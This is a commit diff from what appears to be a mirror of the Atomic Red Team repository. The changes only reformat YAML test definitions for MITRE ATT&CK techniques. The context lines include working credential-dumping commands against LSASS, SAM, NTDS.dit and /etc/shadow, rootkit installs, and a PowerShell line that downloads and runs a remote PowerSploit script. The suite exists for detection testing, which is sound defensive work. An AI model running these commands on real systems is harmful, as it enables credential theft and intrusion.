security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

fix: Updating atomics YAML file structure to align with the new JSON schema definition (#2323)

Browse Source 
* fix: Updating atomics YAML file structure to align with the new JSON schema definition.

This also fixes some white space issues and general line formatting across all impacted atomics.

* fix: One additional change needed

---------

Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Josh Rickard
2023-02-13 17:10:37 -06:00
committed by GitHub
parent 78bd56f47a
commit a5dd0813cd
228 changed files with 3229 additions and 3271 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003.001/T1003.001.yaml
+16 -16
View File
@@ -15,11 +15,11 @@ atomic_tests:
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
type: path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
@@ -69,7 +69,7 @@ atomic_tests:
input_arguments:
dumpert_exe:
description: Path of Dumpert executable
type: Path
type: path
default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe
dependency_executor_name: powershell
dependencies:
@@ -88,12 +88,12 @@ atomic_tests:
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
description: |
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
@@ -146,11 +146,11 @@ atomic_tests:
input_arguments:
input_file:
description: Path of the Lsass dump
type: Path
type: path
default: '%tmp%\lsass.DMP'
mimikatz_exe:
description: Path of the Mimikatz binary
type: String
type: string
default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
@@ -224,8 +224,8 @@ atomic_tests:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
name: powershell
@@ -244,11 +244,11 @@ atomic_tests:
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
type: path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
@@ -280,7 +280,7 @@ atomic_tests:
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
@@ -291,7 +291,7 @@ atomic_tests:
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
supported_platforms:
- windows
@@ -311,7 +311,7 @@ atomic_tests:
cleanup_command: |
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |
@@ -325,11 +325,11 @@ atomic_tests:
input_arguments:
xordump_exe:
description: Path to xordump
type: Path
type: path
default: C:\Windows\Temp\xordump.exe
output_file:
description: Path where resulting dump should be placed
type: Path
type: path
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
dependencies:
- description: |
atomics/T1003.002/T1003.002.yaml
+11 -11
View File
@@ -66,15 +66,15 @@ atomic_tests:
input_arguments:
file_path:
description: Path to the file to copy
type: Path
type: path
default: '%SystemRoot%/system32/config/SAM'
file_name:
description: Name of the copied file
type: String
type: string
default: SAM
copy_dest:
description: Destination of the copied file
type: String
type: string
default: '%temp%'
executor:
command: |
@@ -83,7 +83,7 @@ atomic_tests:
elevation_required: true
cleanup_command: |
del #{copy_dest}\#{file_name} >nul 2>&1
- name: PowerDump Hashes and Usernames from Registry
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
description: Executes a hashdump by reading the hashes from the registry.
@@ -112,17 +112,17 @@ atomic_tests:
input_arguments:
target_hive:
description: Hive you wish to dump
type: String
type: string
default: SAM
limit:
description: Limit to the number of shadow copies to iterate through when trying to copy the hive
type: Integer
type: integer
default: 10
executor:
command: |
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a
name: command_prompt
elevation_required: false
elevation_required: false
cleanup_command: |
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
@@ -135,11 +135,11 @@ atomic_tests:
input_arguments:
target_hive:
description: Hive you wish to dump
type: String
type: string
default: SAM
limit:
description: Limit to the number of shadow copies to iterate through when trying to copy the hive
type: Integer
type: integer
default: 10
executor:
command: |
@@ -148,12 +148,12 @@ atomic_tests:
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
name: powershell
elevation_required: false
elevation_required: false
cleanup_command: |
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
- name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
atomics/T1003.003/T1003.003.yaml
+13 -13
View File
@@ -12,7 +12,7 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
type: string
default: 'C:'
dependencies:
- description: |
@@ -42,11 +42,11 @@ atomic_tests:
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
type: string
default: '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1'
extract_path:
description: Path for extracted NTDS.dit
type: Path
type: path
default: C:\Windows\Temp
dependencies:
- description: |
@@ -94,7 +94,7 @@ atomic_tests:
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
type: path
default: C:\Windows\Temp\ntds_T1003
dependencies:
- description: |
@@ -123,7 +123,7 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon and backslash)
type: String
type: string
default: 'C:\'
dependencies:
- description: |
@@ -148,11 +148,11 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon and backslash)
type: String
type: string
default: 'C:\'
target_host:
description: IP Address / Hostname you want to target
type: String
type: string
default: localhost
dependencies:
- description: |
@@ -177,15 +177,15 @@ atomic_tests:
input_arguments:
source_path:
description: File to shadow copy
type: String
type: string
default: 'c:\windows\ntds\ntds.dit'
target_path:
description: Target path of the result file
type: String
type: string
default: 'c:\ntds.dit'
target_host:
description: IP Address / Hostname you want to target
type: String
type: string
default: localhost
dependencies:
- description: |
@@ -211,7 +211,7 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
type: string
default: 'C:\'
executor:
command: |
@@ -230,11 +230,11 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
type: string
default: 'C:'
symlink_path:
description: symlink path
type: String
type: string
default: 'C:\Temp\vssstore'
executor:
command: |
atomics/T1003.004/T1003.004.yaml
+1 -1
View File
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
psexec_exe:
description: Path to PsExec executable
type: Path
type: path
default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe
dependency_executor_name: powershell
dependencies:
atomics/T1003.006/T1003.006.yaml
+6 -6
View File
@@ -9,19 +9,19 @@ atomic_tests:
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
supported_platforms:
- windows
- windows
input_arguments:
domain:
description: Targeted Active Directory domain
type: String
type: string
default: '%userdnsdomain%'
user:
description: Targeted user
type: String
type: string
default: krbtgt
mimikatz_path:
description: Mimikatz windows executable
type: Path
type: path
default: '%tmp%\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
@@ -56,7 +56,7 @@ atomic_tests:
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
type: string
default: $ENV:logonserver.TrimStart("\")
dependency_executor_name: powershell
dependencies:
@@ -72,4 +72,4 @@ atomic_tests:
command: |
Get-ADReplAccount -All -Server #{logonserver}
name: powershell
elevation_required: False
elevation_required: false
atomics/T1003.007/T1003.007.yaml
+33 -34
View File
@@ -1,4 +1,3 @@
---
attack_technique: T1003.007
display_name: 'OS Credential Dumping: Proc Filesystem'
atomic_tests:
@@ -9,31 +8,31 @@ atomic_tests:
copy process memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
type: path
default: /tmp/T1003.007.sh
pid_term:
description: Unique string to use to identify target process
type: String
type: string
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
executor:
name: sh
@@ -57,41 +56,41 @@ atomic_tests:
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
type: path
default: /tmp/T1003.007.sh
python_script:
description: Path to script generating the target process
type: Path
type: path
default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
pid_term:
description: Unique string to use to identify target process
type: String
type: string
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Requires Python
prereq_command: |
(which python || which python3 || which python2)
get_prereq_command: |
echo "Python 2.7+ or 3.4+ must be installed"
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Requires Python
prereq_command: |
(which python || which python3 || which python2)
get_prereq_command: |
echo "Python 2.7+ or 3.4+ must be installed"
executor:
name: sh
@@ -116,11 +115,11 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.007Test3.txt
MimiPenguin_Location:
description: Path of MimiPenguin script
type: Path
type: path
default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
dependency_executor_name: sh
dependencies:
atomics/T1003.008/T1003.008.yaml
+6 -6
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.008.txt
executor:
command: |
@@ -29,7 +29,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.008.txt
executor:
command: |
@@ -43,11 +43,11 @@ atomic_tests:
description: |
Dump /etc/passwd and /etc/shadow using ed
supported_platforms:
- linux
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.008.txt
executor:
command: |
@@ -61,11 +61,11 @@ atomic_tests:
description: |
Dump /etc/passwd and /etc/shadow using bash builtins
supported_platforms:
- linux
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.008.txt
executor:
command: |
atomics/T1003/T1003.yaml
+10 -10
View File
@@ -18,15 +18,15 @@ atomic_tests:
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: Path
type: path
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: String
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: Url
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
@@ -58,7 +58,7 @@ atomic_tests:
- windows
dependency_executor_name: powershell
dependencies:
- description: NPPSpy.dll must be available in local temp directory
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
get_prereq_command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -85,13 +85,13 @@ atomic_tests:
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump svchost.exe to gather RDP credentials
auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
description: |
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
supported_platforms:
- windows
@@ -107,8 +107,8 @@ atomic_tests:
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
description: |-
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
supported_platforms:
- windows
dependency_executor_name: powershell
@@ -127,8 +127,8 @@ atomic_tests:
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
description: |-
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
supported_platforms:
- windows
dependency_executor_name: powershell
atomics/T1006/T1006.yaml
+1 -1
View File
@@ -18,7 +18,7 @@ atomic_tests:
input_arguments:
volume:
description: Drive letter of the volume to access
type: String
type: string
default: 'C:'
executor:
command: |
atomics/T1007/T1007.yaml
+1 -1
View File
@@ -27,7 +27,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path of file to hold net.exe output
type: Path
type: path
default: '%temp%\service-list.txt'
executor:
command: |
atomics/T1010/T1010.yaml
+2 -2
View File
@@ -12,11 +12,11 @@ atomic_tests:
input_arguments:
input_source_code:
description: Path to source of C# code
type: Path
type: path
default: PathToAtomicsFolder\T1010\src\T1010.cs
output_file_name:
description: Name of output binary
type: String
type: string
default: '%TEMP%\T1010.exe'
dependency_executor_name: powershell
dependencies:
atomics/T1012/T1012.yaml
+4 -4
View File
@@ -39,15 +39,15 @@ atomic_tests:
- name: Enumerate COM Objects in Registry with Powershell
auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
description: |-
This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes.
See: https://www.mandiant.com/resources/hunting-com-objects
This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes.
See: https://www.mandiant.com/resources/hunting-com-objects
supported_platforms:
- windows
input_arguments:
output_file:
description: File to output list of COM objects to
type: String
type: string
default: $env:temp\T1592.002Test1.txt
executor:
command: |
atomics/T1014/T1014.yaml
+13 -13
View File
@@ -10,15 +10,15 @@ atomic_tests:
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
type: Path
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
description: Path To rootkit
type: String
type: string
default: PathToAtomicsFolder/T1014/bin
rootkit_name:
description: Module name
type: String
type: string
default: T1014
dependency_executor_name: bash
dependencies:
@@ -52,15 +52,15 @@ atomic_tests:
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
type: Path
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
description: Path To rootkit
type: String
type: string
default: PathToAtomicsFolder/T1014/bin
rootkit_name:
description: Module name
type: String
type: string
default: T1014
dependency_executor_name: bash
dependencies:
@@ -95,15 +95,15 @@ atomic_tests:
input_arguments:
repo:
description: Url of the github repo zip
type: String
type: string
default: https://github.com/gianlucaborello/libprocesshider/
rev:
description: Revision of the github repo zip
type: String
type: string
default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
library_path:
description: Full path of the library to add to ld.so.preload
type: String
type: string
default: /usr/local/lib/libprocesshider.so
dependency_executor_name: bash
dependencies:
@@ -135,19 +135,19 @@ atomic_tests:
input_arguments:
repo:
description: Url of the diamorphine github repo
type: String
type: string
default: https://github.com/m0nad/Diamorphine/
rev:
description: Revision of the github repo zip
type: String
type: string
default: 898810523aa2033f582a4a5903ffe453334044f9
rootkit_path:
description: Path To rootkit
type: String
type: string
default: /tmp/atomic/Diamorphine
rootkit_name:
description: Module name
type: String
type: string
default: diamorphine
dependency_executor_name: bash
dependencies:
atomics/T1016/T1016.yaml
+9 -9
View File
@@ -80,15 +80,15 @@ atomic_tests:
input_arguments:
output_file:
description: Path of file to write port scan results
type: Path
type: path
default: $env:USERPROFILE\Desktop\open-ports.txt
portfile_url:
description: URL to top-128.txt
type: Url
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt
port_file:
description: The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap.
type: Path
type: path
default: PathToAtomicsFolder\T1016\src\top-128.txt
dependency_executor_name: powershell
dependencies:
@@ -132,7 +132,7 @@ atomic_tests:
name: powershell
- name: Adfind - Enumerate Active Directory Subnet Objects
auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
description: |
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -140,7 +140,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -163,7 +163,7 @@ atomic_tests:
input_arguments:
recon_commands:
description: File that houses list of commands to be executed
type: Path
type: path
default: PathToAtomicsFolder\T1016\src\qakbot.bat
dependency_executor_name: powershell
dependencies:
@@ -182,9 +182,9 @@ atomic_tests:
auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88
description: |
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
supported_platforms:
- macos
@@ -203,5 +203,5 @@ atomic_tests:
- windows
executor:
command: |
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
name: command_prompt
atomics/T1018/T1018.yaml
+29 -29
View File
@@ -37,7 +37,7 @@ atomic_tests:
input_arguments:
target_domain:
description: Domain to query for domain controllers
type: String
type: string
default: '%userdnsdomain%'
executor:
command: |
@@ -51,21 +51,21 @@ atomic_tests:
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
supported_platforms:
- windows
input_arguments:
start_host:
description: Last octet starting value for ping sweep.
type: String
default: "1"
stop_host:
description: Last octet ending value for ping sweep.
type: String
default: "254"
subnet:
description: Subnet used for ping sweep.
type: String
default: 192.168.1
executor:
command: |
input_arguments:
start_host:
description: Last octet starting value for ping sweep.
type: string
default: "1"
stop_host:
description: Last octet ending value for ping sweep.
type: string
default: "254"
subnet:
description: Subnet used for ping sweep.
type: string
default: 192.168.1
executor:
command: |
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
name: command_prompt
- name: Remote System Discovery - arp
@@ -113,15 +113,15 @@ atomic_tests:
input_arguments:
start_host:
description: Subnet used for ping sweep.
type: String
type: string
default: "1"
stop_host:
description: Subnet used for ping sweep.
type: String
type: string
default: "254"
subnet:
description: Subnet used for ping sweep.
type: String
type: string
default: 192.168.1
executor:
command: |
@@ -156,15 +156,15 @@ atomic_tests:
input_arguments:
user_name:
description: username including domain.
type: String
type: string
default: 'domain\user'
acct_pass:
description: Account password.
type: String
type: string
default: "password"
host_name:
description: hostname or ip address to connect to.
type: String
type: string
default: "192.168.1.1"
dependency_executor_name: powershell
dependencies:
@@ -193,7 +193,7 @@ atomic_tests:
elevation_required: true
- name: Adfind - Enumerate Active Directory Computer Objects
auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
description: |
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -201,7 +201,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -217,7 +217,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Domain Controller Objects
auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
description: |
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -225,7 +225,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -307,9 +307,9 @@ atomic_tests:
- windows
dependency_executor_name: powershell
dependencies:
- description: This PC must be joined to a domain.
- description: This PC must be joined to a domain.
prereq_command: |-
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
get_prereq_command: |-
write-host "This PC must be manually added to a domain."
executor:
@@ -373,7 +373,7 @@ atomic_tests:
elevation_required: false
command: |
get-wmiobject -class ds_computer -namespace root\directory\ldap
- name: Remote System Discovery - net group Domain Controller
- name: Remote System Discovery - net group Domain Controller
auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0
description: |
Identify remote systems with net.exe querying the Active Directory Domain Controller.
atomics/T1020/T1020.yaml
+2 -2
View File
@@ -12,11 +12,11 @@ atomic_tests:
input_arguments:
file:
description: Exfiltration File
type: String
type: string
default: C:\temp\T1020_exfilFile.txt
domain:
description: Destination Domain
type: Url
type: url
default: https://google.com
executor:
command: |-
atomics/T1021.001/T1021.001.yaml
+12 -12
View File
@@ -10,19 +10,19 @@ atomic_tests:
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
type: string
default: $ENV:logonserver.TrimStart("\")
domain:
description: domain argument default %USERDOMAIN%
type: String
type: string
default: $Env:USERDOMAIN
username:
description: Username argument default %username%
type: String
type: string
default: $ENV:USERNAME
password:
description: Password
type: String
type: string
default: 1password2!
dependencies:
- description: |
@@ -48,15 +48,15 @@ atomic_tests:
description: |
Changing RDP Port to Non Standard Port via Powershell
supported_platforms:
- windows
- windows
input_arguments:
OLD_Remote_Port:
description: Default RDP Listening Port
type: String
type: string
default: "3389"
NEW_Remote_Port:
description: New RDP Listening Port
type: String
type: string
default: "4489"
executor:
command: |
@@ -66,21 +66,21 @@ atomic_tests:
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port}
Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction ignore
name: powershell
elevation_required: true
elevation_required: true
- name: Changing RDP Port to Non Standard Port via Command_Prompt
auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
description: |
Changing RDP Port to Non Standard Port via Command_Prompt
supported_platforms:
- windows
- windows
input_arguments:
OLD_Remote_Port:
description: Default RDP Listening Port
type: String
type: string
default: "3389"
NEW_Remote_Port:
description: New RDP Listening Port
type: String
type: string
default: "4489"
executor:
command: |
@@ -90,4 +90,4 @@ atomic_tests:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1
netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
name: command_prompt
elevation_required: true
elevation_required: true
atomics/T1021.002/T1021.002.yaml
+11 -13
View File
@@ -10,19 +10,19 @@ atomic_tests:
input_arguments:
user_name:
description: Username
type: String
type: string
default: DOMAIN\Administrator
share_name:
description: Examples C$, IPC$, Admin$
type: String
type: string
default: C$
password:
description: Password
type: String
type: string
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
type: string
default: Target
executor:
command: |
@@ -37,15 +37,15 @@ atomic_tests:
input_arguments:
share_name:
description: Examples C$, IPC$, Admin$
type: String
type: string
default: C$
map_name:
description: Mapped Drive Letter
type: String
type: string
default: g
computer_name:
description: Target Computer Name
type: String
type: string
default: Target
executor:
command: |
@@ -60,11 +60,11 @@ atomic_tests:
input_arguments:
command_path:
description: File to copy and execute
type: Path
type: path
default: C:\Windows\System32\cmd.exe
remote_host:
description: Remote computer to receive the copy and execute the file
type: String
type: string
default: '\\localhost'
psexec_exe:
description: Path to PsExec
@@ -96,16 +96,14 @@ atomic_tests:
input_arguments:
output_file:
description: Remote computer to receive the copy and execute the file
type: String
type: string
default: output.txt
command_to_execute:
description: Command to execute for output.
type: String
type: string
default: hostname
executor:
command: |
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
name: command_prompt
elevation_required: true
atomics/T1021.003/T1021.003.yaml
+1 -1
View File
@@ -16,7 +16,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Name of Computer
type: String
type: string
default: localhost
executor:
command: |
atomics/T1021.006/T1021.006.yaml
+4 -4
View File
@@ -28,7 +28,7 @@ atomic_tests:
Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
cleanup_command: Disable-PSRemoting -Force
name: powershell
- name: WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
@@ -37,15 +37,15 @@ atomic_tests:
input_arguments:
user_name:
description: Username
type: String
type: string
default: Domain\Administrator
destination_address:
description: Remote Host IP or Hostname
type: String
type: string
default: Target
password:
description: Password
type: String
type: string
default: P@ssw0rd1
dependency_executor_name: powershell
dependencies:
atomics/T1027.001/T1027.001.yaml
+1 -2
View File
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
file_to_pad:
description: Path of binary to be padded
type: Path
type: path
default: /tmp/evil-binary
dependency_executor_name: bash
dependencies:
